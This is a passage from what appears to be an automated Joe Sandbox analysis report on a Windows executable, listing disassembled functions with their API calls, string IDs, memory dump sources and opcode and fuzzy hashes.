                                                                                                                                                                                                                                                                                                    • Instruction ID: 0f09c744a5c9767a9b413529321ab9c7c61ef3117f4b28485af926df8900d105
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 177704d5937b67fdd005538ac6576cd1acf882e4b39fdf9be55a945f3665defa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B61126B2610209AFDB01DFA9CC45AFA7BE8EF08318F015524F955E3261E634E850EB60
                                                                                                                                                                                                                                                                                                    Function 00E9D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E9D7C2
                                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E9D7EB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                    • String ID: <local>
                                                                                                                                                                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                    • Opcode ID: 91f816e598fb11f59bb21f49e5a4e7305b355511fd630dfa25082f35dcb89f9b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6980587784c683782139f39520f754f293d7f30233e450c597d99ae0a36cd337
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91f816e598fb11f59bb21f49e5a4e7305b355511fd630dfa25082f35dcb89f9b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211E9711092327DDB344BE68C85EF7BE5DEB127A8F10522BF509A3180D6649844D6F0
                                                                                                                                                                                                                                                                                                    Function 00E875ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00E8761D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E87629
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: STOP
                                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4797e47cbff8604026ad50410e3598e75ba073bce3ed20d74a37ee4e95f63b92
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1372eab66ad93d87e4081e4c962ccfaf72aca63583c6cf3503c12dafc2d89f4e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4797e47cbff8604026ad50410e3598e75ba073bce3ed20d74a37ee4e95f63b92
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101C432A189268BCB10BEFDDC409BF73B5BB607547601624E4ADB6191FB31D940E790
                                                                                                                                                                                                                                                                                                    Function 00E8262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E82699
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 948be2d1b46985b79862d78a56a11739f7f0506edf71012062688e5b5e66905e
                                                                                                                                                                                                                                                                                                    • Instruction ID: c19619c799f1ce5905f37e4e7fe8c715515d822e3d57210b5fe8da958c0843eb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 948be2d1b46985b79862d78a56a11739f7f0506edf71012062688e5b5e66905e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE01B175640229ABCB04FBA4CC51CFE77A8EF56360B00262AA93AB72D5EA7158089750
                                                                                                                                                                                                                                                                                                    Function 00E82525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E82593
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 910357d7d5483cdc58743c906eb53ca47b66ae3a9b5dde4d946a4c9cd614619c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6587606cb1116e328a614c9fc3ffbe83f32e7a03f1dc0817960d86cd2722b771
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 910357d7d5483cdc58743c906eb53ca47b66ae3a9b5dde4d946a4c9cd614619c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2801A775680119ABCB05F7A0D962DFF77E8DF55344F502019790BB72C1DA509E0887B2
                                                                                                                                                                                                                                                                                                    Function 00E825A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E82615
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d19231c2a259b46bec27d6b602b4f577e663300cff0a820dfe8fcd96d2a5e33
                                                                                                                                                                                                                                                                                                    • Instruction ID: 362a5220d0bdd8e117abc2add250064a3cf1f8ab2d9e66e16fa5daa251c2b689
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d19231c2a259b46bec27d6b602b4f577e663300cff0a820dfe8fcd96d2a5e33
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8401D676A40119ABCB15F7A0D901EFF77E8DF15344F50302AB90AB3281EB619E08D7B1
                                                                                                                                                                                                                                                                                                    Function 00E826B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E82720
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 596f1b9a5c71ff47533ac9bb85c6b14d6b8ad95f69d5a3bc0287300e501be7aa
                                                                                                                                                                                                                                                                                                    • Instruction ID: 79dc3360a3dc16fe5967592abfb8063d4c60052111d3383772259bd337df2af8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 596f1b9a5c71ff47533ac9bb85c6b14d6b8ad95f69d5a3bc0287300e501be7aa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBF02875A40228ABCB04F3A49C41FFE73BCEF01390F40291AB52AB32C1DBA1580CC360
                                                                                                                                                                                                                                                                                                    Function 00EB9AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00EB9B6D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00EB9B53
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageProcSend
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 982171247-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5a58c8c08089af2ff92a82fe81c660ca85c661b62934660b4ea8bd045644229e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4de84a9993bb2ef691c501eceddcecff1b59c28ec23f70414963c840596067ad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a58c8c08089af2ff92a82fe81c660ca85c661b62934660b4ea8bd045644229e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A601FC31200214AFCB29AF21EC84EA73BA6FB81368F000268FB022B1F1C7726805DB54
                                                                                                                                                                                                                                                                                                    Function 00E53A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: 2<$j3
                                                                                                                                                                                                                                                                                                    • API String ID: 0-463933582
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f0d5ffd05ef12b78f26e8b7a3840b26cee456be12036145fafe6e9348e203d1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a6bd93da271253ad32d3c4e72a6f6883fe22d0f1fa6301e87852f26c3bb98fc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f0d5ffd05ef12b78f26e8b7a3840b26cee456be12036145fafe6e9348e203d1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6F0B425104149AEDB149FA1CC50AFA73B8DF04B82F10456AFCC9EB291FB758F98D365
                                                                                                                                                                                                                                                                                                    Function 00EB8432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB8471
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00EB847F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 1378638983-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4abb040e827c4e44b70ed34071bb57289a808ddf75aef56f7dd401282a02fe6d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 54cdbdf16f7a1361d1d809319ea176e003c4d66a6e775e2214b18c9cd1403726
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4abb040e827c4e44b70ed34071bb57289a808ddf75aef56f7dd401282a02fe6d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F049356052459FC714DF69DC44DBA77A9FBCA324B10862EFA26A73F0DB709804DB10
                                                                                                                                                                                                                                                                                                    Function 00E81461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E8146F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6356c8947d78bd46f6d5fe13ebe397157b7a93d06e8a7b49df9f2ae6a8660506
                                                                                                                                                                                                                                                                                                    • Instruction ID: d5f31a67f6169e877b87ed4454d0338ff088e3ca3d3d36fdd1524042edfa7f5d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6356c8947d78bd46f6d5fe13ebe397157b7a93d06e8a7b49df9f2ae6a8660506
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1E048322897293BD2153794BC03FC977C48F05B55F15542AF79CB55C39EF324504699
                                                                                                                                                                                                                                                                                                    Function 00E410B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E410E2,?,?,?,00E2100A), ref: 00E3FAD9
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00E2100A), ref: 00E410E6
                                                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E2100A), ref: 00E410F5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E410F0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                    • Opcode ID: 14c4c89b352b66f8c9a4b3cbb44ff156ec618c999f434cbb197bd6001055fcec
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a9ab5ca69a6c097029f61f83b4289631984244908e34628309fb3ca0204bf2b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c4c89b352b66f8c9a4b3cbb44ff156ec618c999f434cbb197bd6001055fcec
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73E06D706003518FD7249F25E905B03BFE4AB00304F009E6CE885F2661EBB5D488CB91
                                                                                                                                                                                                                                                                                                    Function 00E3F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E3F151
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
